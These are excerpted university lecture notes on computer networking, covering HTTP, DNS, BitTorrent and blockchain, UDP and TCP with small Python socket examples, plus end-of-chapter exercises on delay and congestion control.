maintenance, management and interoperability very tough (e.g. new hardware
requires changes to the protocol). We also discussed the concepts of network
delay, packet loss and throughput.
2.6.1 Literature
Suggested reading
• Chapter 1 of the book Computer Networking: A Top-Down Approach by
Kurose and Ross [20, Chapter 1].
3. Consider the queuing delay in a router buffer with infinite size. Assume
that each packet consists of L bits. Let R denote the rate at which packets
are pushed out of the queue (bits/sec). Suppose that the packets arrive
periodically every L/R seconds. What is the average router queuing delay?
4. How does the average transmission delay affect the average queuing delay?
Consider busy routers with a lot of traffic and explain. (Not asking for a
mathematical relation.)
5. Make a reasonable discussion of how the different delay types contribute
to the end-to-end packet delay in the following cases, i.e. indicate which
delay types are likely to have the most influence on each scenario and why.
• A session between two hosts in Canada and Belgium, outside of peak
hours.
• A session between two hosts in Canada and Belgium, during peak
hours (congestion).
• A session between two hosts in Eindhoven outside of peak hours.
Chapter 3
Application Layer
Web browser (e.g. Chrome, Firefox). Function: surf the web, i.e. download web pages. Protocol: Hypertext Transfer Protocol (HTTP). Note: HTTP is built into the web browser.
Web browser. Function: stream Flash video. Protocol: Real Time Messaging Protocol (RTMP), defined by Adobe Flash. Note: the browser has a native player that implements RTMP or it uses Adobe Flash Player as a plugin.
Web browser. Function: stream YouTube video. Protocol: HTTP Live Streaming (HLS). Note: default browsers in iOS and Android support HLS natively.
E-mail client (e.g. Outlook, Mozilla Thunderbird). Function: send and receive e-mails. Protocols: Exchange protocol and HTTP for mail in both directions; SMTP for outgoing mail; POP3, IMAP for incoming mail. Note: protocols built into the application.
File transfer client (e.g. FileZilla, CyberDuck). Function: transfer files from and to a server. Protocol: File Transfer Protocol (FTP). Note: FTP is built into the application client.
Table 3.1: Some applications and the application layer protocols supporting their
functions. The list of application protocols is not meant to be complete or
comprehensive. It serves as an example.
2 http://www.itv.com/news/2015-10-20/apple-withdraws-hundreds-of-apps-after-privacy-breach/
Figure 3.1: The number of apps in the Apple app store over the years. (Figure
source: statista.com)
or end devices. They are application programs (or rather processes), which are
most of the time remotely located. These may also reside on the same end
device, e.g. two processes running in the same computer may communicate over
a network connection.
Furthermore, application layer protocols are not for the network core. A
design goal, which is particularly critical for large networks like the Internet,
is to push complexity to the network edge. In the Internet, a router does
not run user applications and application layer protocols because it would be
just too complex considering the combination with all the packet traffic and
processing it has to deal with. However, it is not strictly forbidden or impossible
to put an application in places other than end devices, e.g. for debugging or
testing purposes. In this course, we will disregard these exceptions and consider
that routers always implement up to layer 3 (network layer), and that layers 4
and 5 (transport and application layers) are implemented only by end devices.
Computer network applications of users live on end devices that communicate
over a network infrastructure as shown in Figure 3.2. An example is the relation
between a web browser program and a web server program.
Figure 3.2: Network applications and their protocols live on end devices. (Figure
by Kurose and Ross)
program code defining variables and actions on variables. The operating system
can create multiple processes from the same program. For example, you can
have multiple instances of a web browser program execute concurrently.
In this model, there is an always-on server (or a set of servers that share the
load) that runs a server program at all times, 24/7, always ready to
serve requests of client processes. The server typically has access to an ample
amount of computation, storage and bandwidth resources, and has a permanent
network address (e.g. an IP address in the Internet). The client on the other
hand may be online or offline (on demand e.g. of its user) and can change its
(IP) address.
Figure 3.5: Multiple clients (client processes) connecting to a single server (pro-
cess) in the client-server model. (Figure by Forouzan)
Typically a lot of clients are served by a server. As of April 2016, there are
7000+ Tweets posted, 700+ Instagram photos uploaded, and 53000+ Google search
queries submitted every second3. This translates to huge client-server traffic.
In order to deal with these scalability issues service providers build very large
server farms that by themselves need huge amounts of power (Watts). That is
why server farm locations have to be chosen very carefully looking at climate
and nature (e.g. for water cooling).
Pure clients do not communicate directly with each other and if they do, at
least one of them has to have both client and server parts. If both have client
and server parts but they do not exactly act like a server (e.g. not always-on)
then the difference from the peer-to-peer model becomes a bit blurry. Note
that even applications with peer-to-peer architectures have client processes and
server processes (i.e. one initiates the connection and the other accepts it).
3 http://www.internetlivestats.com/one-second/
A transport layer protocol may provide some of these services. For example
the Transmission Control Protocol (TCP) of the Internet’s transport layer is
connection-oriented: a connection setup is required between client and server
processes. It provides reliable transport of application messages between sending
and receiving processes and it makes sure that packets are delivered to processes
in the correct order. It provides flow control between the sender and the receiver
such that the sender does not overwhelm the receiver by sending too much, too
fast. It is sensitive to increasing network traffic and implements congestion
control by throttling the sender process when network delays are high (i.e. long
router queues). However, TCP as a protocol does not provide delay, minimum
throughput or security guarantees.
User Datagram Protocol (UDP), on the other hand, does the bare minimum
expected from a transport layer protocol, that is process to process delivery of
data. UDP does not provide connection setup, reliability, flow control, conges-
tion control, timing guarantees, throughput guarantees, or security.
Why do we bother with UDP when TCP seems to provide all those services
that UDP does not? The answer lies in the simplicity and the speed of UDP.
Some services that are provided by TCP may not be needed. For example, if the
link is already reliable, you don’t need additional reliability from the transport
layer protocol. Moreover, if for some reason the application runs on top of
UDP, those extra services that are needed can always be implemented in the
application layer protocol (e.g. reliability). We will come back to UDP and
TCP later in Chapter 4.
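As a small illustration of how little UDP does for the application, the sketch below (the host name and port number are placeholders, not a real service) sends a single datagram and waits briefly for a reply; any reliability, ordering or retransmission would have to be added by the application itself.

```python
# Minimal UDP exchange: no connection setup and no delivery guarantee.
# The destination host and port are placeholders for this illustration.
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(2.0)                            # UDP gives no guarantees,
sock.sendto(b"hello", ("example.com", 9999))    # so time out instead of waiting forever
try:
    data, addr = sock.recvfrom(2048)            # the reply may simply never arrive
    print("received", data, "from", addr)
except socket.timeout:
    print("no reply; the application must decide whether to retry")
finally:
    sock.close()
```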
Examples of application layer protocols and their underlying transport layer
support are given in Figure 3.9.
Figure 3.9: Transport layer protocols supporting various applications and appli-
cation layer protocols. (Figure by Kurose and Ross)
In order to address the destination process at the other side of the connection,
a process needs an identifier for the process, or equivalently, an identifier for the
corresponding socket.4
In the Internet, processes are identified by using IP addresses and port num-
bers. For example, a web browser addresses a web server using the IP address
of the web server (which is resolved from a web address) and the default HTTP
server port number 80. We will cover network sockets and process-to-process
addressing in much more detail in Chapter 4.
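The sketch below shows this addressing in practice (the host name is a placeholder): the client first resolves a host name to an IP address and then connects a TCP socket to the (IP address, port) pair that identifies the server process.

```python
# A remote process on the Internet is addressed by an (IP address, port) pair.
# The host name below is a placeholder for this illustration.
import socket

ip = socket.gethostbyname("www.example.com")    # name -> IP address (via DNS)
server_address = (ip, 80)                       # port 80: the default HTTP port

with socket.create_connection(server_address, timeout=5) as sock:
    print("connected to the process at", sock.getpeername())
```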
the world-wide web. Before we explain HTTP services, let us define some web
terms that will be used in this discussion. A web page consists of objects such
as HTML (Hypertext Markup Language) files, images, Java applets, and audio
files. Each object is associated with a URL. The HTML file is the base file that
contains text and several references to the other objects of the web page in the
form of URLs.
The client process (e.g. a web browser like Google Chrome, Internet Ex-
plorer) requests, receives, and displays web objects. The server process (e.g.
an Apache web server) sends objects in response to HTTP requests as shown
in Figure 3.10. HTTP uses a TCP connection on the well-known HTTP port
number 80. In one of the lab sessions you are asked to build such a web server.
Figure 3.10: HTTP request and response. (Figure by Kurose and Ross)
HTTP request message: The exact format of the HTTP request message
is as shown in Figure 3.12. An example HTTP request message is given in
Figure 3.13.
• Request line: This is the first line that indicates the type of the re-
quest (method), the directory “path” of the requested object URL, and
the HTTP version.
Figure 3.11: HTTP message flow diagram upon entering the URL www.win.tue.
nl/index.html. (Figure by Kurose and Ross)
• Header lines: The header lines in this field contain information such
as the “host” part of the requested object’s URL, the name of the web
browser, the requested type of connection (persistent or not) and the re-
quested language (useful if the web server provides versions in multiple
languages, e.g. when you want to view the web page in Dutch).
• Carriage return, line feed: Indicates the end of the HTTP request
header. The body of the message (i.e. the application payload) follows
this.
Figure 3.13: HTTP request message example. (Figure by Kurose and Ross)
HTTP response message: The exact format of the HTTP response message
is as shown in Figure 3.14. An example HTTP response message is given in
Figure 3.15.
• Response line: This is the first line that contains the HTTP version and
the response code, e.g. 200 OK, 404 Not Found.
• Header lines: The header lines in this field contain information such as
type of connection (persistent or not), date and time of response, server
software identification, date and time of last modification for the object
included in the response, the object length and the object type.
• Carriage return, line feed: Indicates the end of the HTTP response
header. The requested object follows this.
Figure 3.15: HTTP response message example. (Figure by Kurose and Ross)
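To see how the request line, the header lines and the terminating blank line actually go over the wire, the sketch below (again with a placeholder host name) sends a minimal HTTP/1.1 GET request over a TCP socket and prints the status line and headers of the response.

```python
# Send a minimal HTTP request "by hand" and show the raw response header.
# The host name is a placeholder for this illustration.
import socket

host = "www.example.com"
request = ("GET /index.html HTTP/1.1\r\n"
           f"Host: {host}\r\n"
           "Connection: close\r\n"
           "\r\n")                          # the blank line ends the request header

with socket.create_connection((host, 80), timeout=5) as sock:
    sock.sendall(request.encode("ascii"))
    reply = b""
    while chunk := sock.recv(4096):         # read until the server closes the connection
        reply += chunk

header, _, body = reply.partition(b"\r\n\r\n")
print(header.decode("ascii", errors="replace"))   # e.g. "HTTP/1.1 200 OK" plus header lines
```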
to keep state and HTTP’s cookie header line (added after cookie introduction)
facilitates this.
A cookie is a file created and stored by the client based on an HTTP request-
response interaction and it is managed by the web browser. Every time the
client visits the same website the cookie identity is communicated inside the
HTTP request message. The web server can do some cookie specific action with
this information (e.g. book recommendation by the bookstore) using the data
accumulated about this specific client at a back-end database. This is illustrated
in Figure 3.16.
Since cookies allow a website to gather information about a user (what you
like, what you search, etc.), they can potentially allow third parties to identify you,
which is a clear privacy issue.
• Address resolution.
In the hierarchical name space of DNS, each name is made of several parts.
This hierarchy corresponds to a tree structure as shown in Figure 3.18. A domain
is nothing but a subtree of this tree structure. Each domain is identified by a
domain label and the top level domain labels are, e.g. generic (3 letters) such
as com, edu, org, net, or per country (2 letters) such as nl, fr. Finally, a domain
name is a sequence of labels separated by dots, e.g. win.tue.nl has the labels
win, tue and nl.
If a DNS server knows how to translate the queried domain name, it responds
with the translation. If a DNS server does not know how to translate a particular
domain name, it asks another one, and so on in a hierarchical manner, until the
correct IP address (or domain name in case of inverse translation) is returned.
Two types of DNS query handling are shown in Figure 3.19, where a host at
cis.poly.edu wants to find out the IP address for gaia.cs.umass.edu. On
the left, a recursive DNS query from the host to its local DNS server is followed
by a number of iterative DNS queries issued by that local DNS server. On the
right, the figure shows all recursive DNS queries. In the "all recursive" case the
requesting host puts the burden of name resolution on the hierarchy of DNS name
servers, which results in a heavy load on the DNS infrastructure, especially when
we consider the huge numbers of queries that occur in reality. The use of both
UDP and TCP is possible in DNS, on port number 53.
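From the application's point of view, address resolution is usually a single socket API call; the local resolver then contacts the DNS servers as described above. The following minimal Python sketch illustrates this (the host name is the example used in Figure 3.19):

    import socket

    name = "gaia.cs.umass.edu"
    # Ask the local resolver for the IPv4 (A record) addresses of the name.
    for family, _, _, _, sockaddr in socket.getaddrinfo(name, None, socket.AF_INET):
        print(name, "->", sockaddr[0])     # one line per returned address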
The DNS server hierarchy is exemplified in Figure 3.20, where the Top-Level
Domain (TLD) servers are responsible for all top-level country domains as well
Figure 3.19: DNS queries. Left side: iterative and recursive queries mixed.
Right side: All recursive queries. (Figure by Kurose and Ross)
as for com, org, net, edu, etc. Authoritative DNS servers are DNS servers of
individual organizations. These DNS servers provide authoritative hostname
to IP mappings for an organization’s servers (e.g. Web, mail). They can be
maintained by the organization or its service provider.
3.5.3 BitTorrent
In peer-to-peer file sharing, a peer starts to serve as a file source as soon as it
receives some part of the file from another peer, i.e. it shares what it has already
received. Due to difficulties in managing content that is shared, peer-to-peer
file sharing has been subject to many lawsuits.
BitTorrent is an application layer protocol for file sharing. Here the term
torrent refers to a set of peers sharing parts of a file (i.e. each peer shares the
parts it has).
Exchanging File Chunks: In BitTorrent the shared files are first divided into
chunks of size 256 KB. When trackers are used a new peer registers with the
tracker to get a list of peers that are participating in the same torrent. This new
peer does not yet have any chunks and starts accumulating chunks after making
TCP connections to some peers. The peers with which a TCP connection is
established are called neighbors. The new peer then starts downloading the chunks
it does not yet have: it asks each of its neighbors for the list of chunks that they
have and requests the missing chunks, starting with the rarest chunks.
In the meantime it uploads the chunks it has already
accumulated to other peers. Every 10 seconds a peer ranks its neighbors based
on the respective download rates from these neighbors. The peer sends chunks
to the top four neighbors in this ranking.
Every 30 seconds a peer (say Alice) randomly selects another peer to send
chunks to so that new peers (who do not have many chunks to share) get a chance
to make it to the top four list of other peers and ramp up their download speeds.
If the new peer (say Bob) reciprocates, it may get into the top four senders list
of Alice, effectively ramping up his download and upload speeds.
Figure 3.21: The list of top 4 providers for a peer changes dynamically over
time, leading to larger cumulative upload and download speeds. (Figure by
Kurose and Ross)
After receiving the entire file the peer continues to upload without down-
loading.
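The chunk selection and neighbor ranking described above can be illustrated with a small Python sketch. All names and numbers below are invented for illustration; this is not the BitTorrent wire protocol.

    from collections import Counter

    def rarest_first(missing_chunks, neighbor_chunks):
        """Pick the missing chunk that is held by the fewest neighbors."""
        counts = Counter()
        for chunks in neighbor_chunks.values():          # chunks each neighbor advertises
            counts.update(chunks & missing_chunks)
        available = [c for c in missing_chunks if counts[c] > 0]
        return min(available, key=lambda c: counts[c]) if available else None

    def top_four(download_rate):
        """Every ~10 seconds: keep uploading to the four neighbors with the highest download rates."""
        return sorted(download_rate, key=download_rate.get, reverse=True)[:4]

    missing = {3, 5, 7}
    neighbors = {"A": {3, 5}, "B": {5}, "C": {5, 7}}
    print(rarest_first(missing, neighbors))                   # 3 or 7 (held by only one neighbor)
    print(top_four({"A": 80, "B": 120, "C": 40, "D": 95}))    # ['B', 'D', 'A', 'C']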
3.5.4 Blockchain
Blockchain is a protocol for building applications for distributed bookkeeping
purposes. Consider a bank that is responsible for bookkeeping of transactions
of the bank clients. The bank transaction records represent a centralized ledger
that contains such bookkeeping while hiding transactions of individual clients
from each other and from other parties. An alternative to this is a decentralized
ledger implemented on a distributed P2P network, i.e. a blockchain. The ledger
is maintained by the peers and it is important to make sure that the transac-
tions are consistent from the perspectives of all joining peers. A ledger consists
of a chain of records (data structures) that are called "blocks", hence the name
"blockchain". Block i contains a record including some transactions, a times-
tamp and a cryptographic hash of the previous block, H(Block i−1), as shown in
Figure 3.23.
In a blockchain every peer can see and verify all transactions. Note that this
is the opposite of traditional bookkeeping practice. Inserted blocks are there to
stay, i.e. it is only possible to add information to a blockchain (no deletions).
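The hash-chaining idea can be sketched in a few lines of Python. The choice of SHA-256 and the block fields used here are assumptions made purely for illustration; the notes do not prescribe a particular hash function or block format.

    import hashlib, json, time

    def block_hash(block):
        # Hash a canonical (sorted-key) serialization of the block contents.
        return hashlib.sha256(json.dumps(block, sort_keys=True).encode()).hexdigest()

    def append_block(chain, transactions):
        prev_hash = block_hash(chain[-1]) if chain else "0" * 64
        chain.append({"transactions": transactions,
                      "timestamp": time.time(),
                      "prev_hash": prev_hash})        # H(Block i-1) stored inside Block i

    chain = []
    append_block(chain, ["Alice pays Bob 5"])
    append_block(chain, ["Bob pays Carol 2"])

    # Tampering with an earlier block breaks the chain of hashes:
    chain[0]["transactions"] = ["Alice pays Bob 500"]
    print(chain[1]["prev_hash"] == block_hash(chain[0]))   # False after tampering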
3.6 Summary
The goal of this chapter was to provide an overview of the application layer,
including possible architectural styles and its service models as well as the ser-
vices it needs from the transport layer. The socket API gives the necessary tools
to program network applications. The concepts introduced were exemplified by
several well-known application layer protocols. The reader should now be able to
distinguish between an application and the application layer protocol that
supports the application.
3.6.1 Literature
Suggested reading
• Chapter 2 of the book Computer Networking: A Top-Down Approach by
Kurose and Ross [20, Chapter 2].
Suppose that the average object size is 900,000 bits and that the average
request rate from the institution’s browsers to the origin servers is 1.5
requests per second. Also suppose that the amount of time it takes from
when the router on the Internet side of the access link forwards an HTTP
request until it receives the response is two seconds on average. In this
exercise we model the total average response time as the sum of the average
access delay (that is, the delay from Internet router to institution router)
and the average Internet delay. For the average access delay, use Δ/(1 − Δβ),
where Δ is the average time required to send an object over the access link and
β is the arrival rate of objects to the access link.
Chapter 4
Transport Layer
Figure 4.2: The position of the transport layer in the Internet protocol stack.
(Figure by Forouzan)
In this chapter, the issues addressed by transport layer protocols and trans-
port layer service models are introduced. The two transport layer protocols of
the Internet, UDP and TCP are explained and standard problems are discussed
in this context. Precisely, we try to answer the following questions:
• What are the principles of transport layer services and protocols?
• How to realize reliable process-to-process delivery, flow control and con-
gestion control?
• What are the details of transport layer protocols of the Internet?
In this text we will focus on the reliable transfer service provided in the Internet’s transport
layer.
Transport Layer Multiplexing: At the sender side, the transport layer re-
ceives data from sender processes and encapsulates these in transport layer
segments by adding transport layer headers to them. Finally, these seg-
ments are passed to the network layer for further processing.
Transport Layer Demultiplexing: At the receiver side, the segments that
are passed from the network layer to the transport layer are examined and
the data extracted from these are directed to their respective destination
processes.
The destination IP address is enough to address the destination host. However, by
itself, it is not enough to point to the destination process. Individual processes
running on a given host are identified by their port numbers, which they acquire
via the socket API. As we discussed earlier in Chapter 3, process-to-process
addressing makes use of network sockets. A socket is identified by a
combination of IP address(es) and port number(s).
A port number is a 16-bit integer that takes a value between 0 and 65535.
Internet Assigned Numbers Authority (IANA), which is a sub-department of
Internet Corporation for Assigned Names and Numbers (ICANN), is the offi-
cial authority that ‘reserves’ port numbers for various applications. The port
numbers ranging from 0 to 1023 (also known as well-known port numbers) are
reserved for applications such as FTP (file transfer), HTTP (world-wide web)
and SMTP (e-mail).
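The following Python sketch shows how a process acquires port numbers through the socket API: it can bind a socket to a port of its own choice, or bind to port 0 and let the operating system assign a free (ephemeral) port. The port number 54321 is an arbitrary example above the well-known range.

    import socket

    # Bind a UDP socket to an explicitly chosen port:
    s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s1.bind(("0.0.0.0", 54321))

    # Bind to port 0 and let the operating system pick a free ephemeral port:
    s2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s2.bind(("0.0.0.0", 0))

    print("s1 bound to port", s1.getsockname()[1])   # 54321
    print("s2 bound to port", s2.getsockname()[1])   # an OS-chosen ephemeral port
    s1.close()
    s2.close()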
The following questions and answers describe the typical use of port numbers and
network sockets. Note that even though this may not be ‘good practice’, it is not
strictly forbidden to do it differently and you may find operating systems that
allow alternative ways.
– Two processes may listen on the same port number. For example, a
web server can run multiple processes listening on the port number
80. When a transport layer segment with destination port number
80 arrives to this server, the extracted data is sent to one of these
web server processes by the transport layer.
• Is there a single network socket per process or can a process use more than
one socket?
– There can be more than one socket per process, each with a unique
identifier. The exact format of the identifier depends on whether the
socket is a UDP or TCP socket.
– Yes, this is possible with UDP. TCP does not allow this as it is
based on a ‘connection’ with only one sender and one receiver (see
Section 4.3).
• How does IANA enforce the use of well-known port numbers explicitly by
certain application types?
A TCP connection is a one-to-one communication and another web browser may not make HTTP
requests to the same socket (but it may make HTTP requests to the same
process through another TCP socket).
A connection between the processes is established using a message exchange
procedure called a ‘three-way handshake’ as shown in Figure 4.4.2 A connection
is terminated as shown in Figure 4.5.
A connection-less service on the other hand does not require the establish-
ment of a connection prior to data transfer and it is stateless. Processes are free
to send data packets to any connection-less socket and all will be delivered to the
receiving process through the socket. UDP is an example of a connection-less
transport layer protocol.
2 You may ask yourself why it is called a three-way handshake when a total of 4 messages seem
to be involved. It is because the second and the third messages are typically merged into one
message. In full-duplex communication, where data packets flow in both directions, sending
acknowledgement data together with application data is called piggybacking.
4.4.1 UDP
UDP is a connection-less transport layer protocol that provides multiplexing and
demultiplexing as the only services. Although UDP lacks most of the services
that TCP provides, UDP applications enjoy advantages of its simplicity:
• UDP packet header size is only 8 bytes and that means very small com-
munication overhead in comparison to 20+ bytes long TCP headers. This
is especially important if the application needs to communicate very little
data (a few bytes) very often.
• UDP does not perform congestion control, which means that UDP appli-
cations can utilize the full speed of the communication channel.
Figure 4.7: The destination process is addressed using the destination IP address
and the destination port number. (Figure by Forouzan)
The UDP sender computes the checksum over certain parts of the IP header
(called the pseudo IP header), the UDP header and the payload. The compu-
tation considers all this as a sequence of 16-bit integers and adds them up (1’s
complement sum). The checksum is the 1’s complement of the result. In order
to check for errors, the UDP receiver simply has to compute the checksum of
a received packet again and compare it with the checksum header field value.
If these two values are not equal, the receiver concludes that the segment is
corrupt and discards the segment. Note that this method may still miss some
errors, e.g. certain combinations of two or more flipped bits.
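The 1's complement checksum computation can be sketched as follows in Python. The construction of the pseudo IP header is omitted; data stands for the byte sequence (pseudo header, UDP header and payload) over which the checksum is computed, and the example bytes are arbitrary.

    def ones_complement_checksum(data: bytes) -> int:
        if len(data) % 2:                              # pad to a whole number of 16-bit words
            data += b"\x00"
        total = 0
        for i in range(0, len(data), 2):
            total += (data[i] << 8) | data[i + 1]      # add the next 16-bit word
            total = (total & 0xFFFF) + (total >> 16)   # fold the carry back in (1's complement sum)
        return ~total & 0xFFFF                         # checksum = 1's complement of the sum

    segment = b"\x12\x34\x56\x78\x9a"                  # arbitrary example bytes
    checksum = ones_complement_checksum(segment)
    # The receiver recomputes the checksum over the received bytes and compares it
    # with the checksum field; equivalently, summing everything including the
    # checksum yields 0xFFFF when no error is detected.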
4.4.2 TCP
TCP is a connection-oriented transport protocol that provides extra services on
top of multiplexing and demultiplexing such as
• flow control
• congestion control
Figure 4.9: TCP sockets, buffers and the (byte stream) connection between two
processes. (Figure by Kurose and Ross)
• source IP address
• source port number
• destination IP address
• destination port number
In demultiplexing, the receiver uses this full identifier consisting of four parts
to choose the correct delivery socket (hence the correct process). Because of
this, for example a web server is able to deal with many TCP connections from
different users at port number 80. Since the source IP addresses and/or source
port numbers of the web browsers of individual users are different, their TCP
segments are delivered to different TCP sockets with identical destination IP
and destination port number fields. This is illustrated in Figure 4.10 using the
web server example.
Even for the same user, (non-persistent) parallel HTTP connections will re-
sult in a different socket (identifier) for each request since parallel TCP connec-
tions will have different source port numbers. This is illustrated in Figure 4.11.
Figure 4.10: TCP demultiplexing for segments with identical header fields except
for sender’s IP address. (Figure by Kurose and Ross)
Figure 4.11: TCP demultiplexing for segments with identical header fields except
for sender’s port number. P2 and P3 together could have been a single process
but that would not change anything. (Figure by Kurose and Ross)
• The second word contains the sequence number, which is in fact the index
of the first byte of the segment within the whole byte stream. Note that
the numbering is on the byte count and not the segment count. Therefore,
consecutive segments do not necessarily have sequential numbers. Further-
more, the sequence numbers in each direction are independent and both
start from a random value. Numbering is used for error control and flow
control.
• The fourth word starts with the HLEN field that indicates the total length
of the TCP header in number of (32-bit) words. This is followed by 6 bits that
are reserved3 for future use and by the six 1-bit flags URG, ACK, PSH, RST,
SYN and FIN. The window size field indicates the number of bytes that the
receiver is willing to receive and is used for flow control.
3 Three of the six are already standardized in the meantime. Interested students can check
the current TCP specifications for details.
• The fifth word contains checksum and urgent pointer fields. The checksum
use is the same as in UDP. The urgent pointer field is used if the URG
flag is set and it is an offset from the sequence number indicating the last
urgent data byte.
• The first five words of the header are followed by the ‘Options and padding’
fields, which can be up to 10 words long (HLEN determines the total
length). We will not discuss these. Padding refers to filling with zeros
until the total header length is an integer multiple of 32 bits.
The receiver side uses buffering, sequence numbers, TCP checksum and
cumulative acknowledgements for contributing to reliable data delivery.
• The TCP receiver detects and discards segments that are corrupted (using
checksum) or that are duplicates (using sequence numbers).
• The receiver confirms the reception of bytes to the sender side by sending
cumulative acknowledgements. Precisely, the receiver acknowledges the
sequence number of the next byte that is expected. The events leading to
acknowledgement generation by the receiver are given in Figure 4.13.
• The receiver buffers the segments that are received out-of-order and deliv-
ers data to the destination process only after filling in the gaps (i.e. data
arrives at the process in order). When segments arrive at the receiver out-
of-order, the receiver acknowledges the first byte of the gap (at the lower
end). Therefore, repetitively receiving out-of-order packets that do not
contain the ‘next expected byte’ will trigger duplicate acknowledgements.
The sender side relies on the TCP retransmission timer and on counting duplicate
acknowledgements to decide whether or not to retransmit segments.
• The TCP sender maintains four timers (Figure 4.14). One of these timers
is the retransmission timer. If an acknowledgement confirms the recep-
tion of previously unacknowledged packets, this timer is either stopped
or reset (see the exact operation of the TCP sender with retransmission
timer and acknowledgements in Figure 4.15). TCP interprets expiration
of this timer as an indication of congestion. When the timer expires, the
TCP sender retransmits the segment and resets the timer. Figure 4.16
gives examples of TCP retransmission scenarios.
• Fast retransmit: The retransmission timer may take a long time to ex-
pire, resulting in late retransmissions of lost packets. The TCP sender
continuously checks the acknowledgement numbers filled in by the re-
ceiver and tries to identify packet losses by looking at duplicate acknowl-
edgements. The logic of ‘fast retransmit’ is simple: The sender typically
pipelines its segments and sends many segments in a short time. If there
is congestion, it is likely that a lot of these segments will be lost and the
sender will not get many (duplicate) acknowledgements. However, if it
is just a single segment (or a few) that is lost, there will be many dupli-
cate acknowledgements (asking for the first byte of the gap). When the
TCP sender receives 3 acknowledgements pointing to the first byte of the
lost segment, it will go into the fast retransmit mode and retransmit this
segment. The necessary modification to the TCP sender to include fast
retransmit is shown in Figure 4.17, together with an example.
Figure 4.17: Simplified TCP sender operation with fast retransmit (without
congestion control and flow control). (Figure by Kurose and Ross)
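The duplicate-acknowledgement rule behind fast retransmit can be sketched as follows. The function and variable names are invented for illustration; a real TCP sender combines this rule with the retransmission timer and with congestion control.

    def retransmit_segment_starting_at(seq_no):
        print("fast retransmit of the segment starting at byte", seq_no)

    def on_ack(ack_no, state):
        if ack_no > state["highest_ack"]:              # new data is acknowledged
            state["highest_ack"] = ack_no
            state["dup_acks"] = 0
        else:                                          # duplicate acknowledgement
            state["dup_acks"] += 1
            if state["dup_acks"] == 3:                 # 3 duplicates -> fast retransmit
                retransmit_segment_starting_at(ack_no)

    state = {"highest_ack": 0, "dup_acks": 0}
    for ack in [1000, 1000, 1000, 1000]:               # one new ACK followed by 3 duplicates
        on_ack(ack, state)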
The Internet is a global heterogeneous network with hosts and access links
working at different speeds. Imagine that an application on your smart watch
is downloading a large file (e.g. an operating system update). The available
download throughput can be much higher than what the smart watch can handle,
for example, if writing to the secondary storage of the smart watch is slow.
What is needed for correct operation is a bitrate (bits per second) matching
service between the sender process and the receiver process. This is more or
less what the flow control of TCP does.
The receiver fills in the window size field of each TCP segment (i.e. in pure
acknowledgements or in data segments in two-way communication) with the number
of bytes that it is still willing to receive in its buffer (see Figure 4.18). The
sending process uses this information to adjust its speed. A window size of zero
causes the sender to stop sending data and start the persistence timer. When
this timer expires, the sender sends one (small) packet to probe the status of
the receiver's buffer.
Figure 4.18: The receiving process may be slow at reading from this buffer.
(Figure by Kurose and Ross)
Slow Start and Additive Increase: The TCP sender starts with a con-
gestion window (cwnd) that is equal to 1 segment (with size maximum
segment size (MSS)4 ). In this slow start phase, starting from a cwnd of 1,
the sender tries to reach a large congestion window very quickly. To do
this, the sender increases its congestion window by 1 segment for each
acknowledgement received, until cwnd reaches a threshold value (effectively an
exponential increase of speed until the threshold). At this point the sender goes
into a congestion avoidance phase where cwnd is increased by 1/cwnd segments
for each successfully received acknowledgement, until cwnd is equal to the
receiver window size.
At any given time during transmission the send window of the sender (i.e.
maximum number of in-flight segments) is equal to the minimum of the receiver’s
advertised window size and the congestion window size cwnd.
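A per-RTT sketch of this behaviour is given below in Python. The names cwnd, ssthresh and rwnd are conventional, the numbers are arbitrary and no loss events are modelled.

    def cwnd_evolution(ssthresh=8, rwnd=16, rounds=10):
        cwnd = 1                        # congestion window in segments (units of MSS)
        history = []
        for _ in range(rounds):
            history.append(cwnd)
            if cwnd < ssthresh:
                cwnd *= 2               # slow start: +1 segment per ACK, i.e. doubling per RTT
            else:
                cwnd += 1               # congestion avoidance: +1/cwnd per ACK, i.e. +1 per RTT
            cwnd = min(cwnd, rwnd)      # never exceed the receiver's advertised window
        return history

    print(cwnd_evolution())             # [1, 2, 4, 8, 9, 10, 11, 12, 13, 14]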
TCP Visualizer
Visit http://www.win.tue.nl/~mholende/tcpviz/ in order to download the TCP
Visualizer software tool, which is developed and maintained by Dr. Mike Holen-
derski.
TCP Visualizer aims at showing the differences between three flavours of the
TCP protocol: TCP Tahoe, TCP Reno and TCP New Reno. It shows different
views on the TCP protocol from the perspective of the sender:
• the outgoing buffer together with the sliding congestion window (CWND)
• a plot of the CWND size and threshold (SSTHRES) against time and
against round-trip time (RTT)
4.5 Summary
The transport layer provides services on top of the network layer. The most basic
transport layer services are process addressing and process-to-process data delivery.
UDP provides only these basic services while TCP provides additional services
such as reliable data transfer, flow control and congestion control.
4.5.1 Literature
Suggested reading
2. Consider sending a large file from one host to another over a TCP connec-
tion that has no loss.
(a) Suppose TCP uses AIMD for its congestion control without slow
start. Assuming CongWin increases by 1 MSS every time a batch of
ACKs is received and assuming approximately constant round-trip
times, how long does it take for CongWin to increase from 1 MSS to
8 MSS (assuming no loss events)?
(b) What is the average throughput (in terms of MSS and RTT) for this
connection up to time = 7 RTT?
(a) Identify the intervals of time when TCP slow start is operating.
(b) Identify the intervals of time when TCP congestion avoidance is op-
erating.
(c) After the 16th transmission round, is segment loss detected by a triple
duplicate ACK or by a timeout?
(d) After the 22nd transmission round, is segment loss detected by a
triple duplicate ACK or by a timeout?
(e) What is the initial value of Threshold at the first transmission
round?
(f) What is the value of Threshold at the 18th transmission round?
(g) During what transmission round is the 70th segment sent?
(h) Assuming a packet loss is detected after the 26th round by the receipt
of a triple duplicated ACK, what will be the values of the congestion
control window size and of Threshold?
(a) Consider a reliable data transfer protocol that uses only negative
acknowledgments (NAKs). Suppose the sender sends data only in-
frequently. Would a NAK-only protocol be preferable to a protocol
that uses acknowledgments (ACKs) only? Why?
(b) Now suppose the sender has a lot of data to send and the end-to-end
connection experiences few losses. In this case, would a NAK-only
protocol be preferable to a protocol that uses ACKs? Why?
Chapter 5
Network Layer
5.1 Internetworking
The host-to-host path in a computer network may pass through many types of
(wired and wireless) physical network links, and the internetworking service
provided by the network layer is an abstraction from this diversity. Further-
more, despite the variety of link technologies and the link-specific addresses and
protocols, the transport layer enjoys a uniform numeric addressing scheme
provided by the network layer.
The network layer of the Internet is implemented in both the network edge
(hosts: clients, servers, peers) and the network core (routers) as shown in Fig-
ure 5.2.
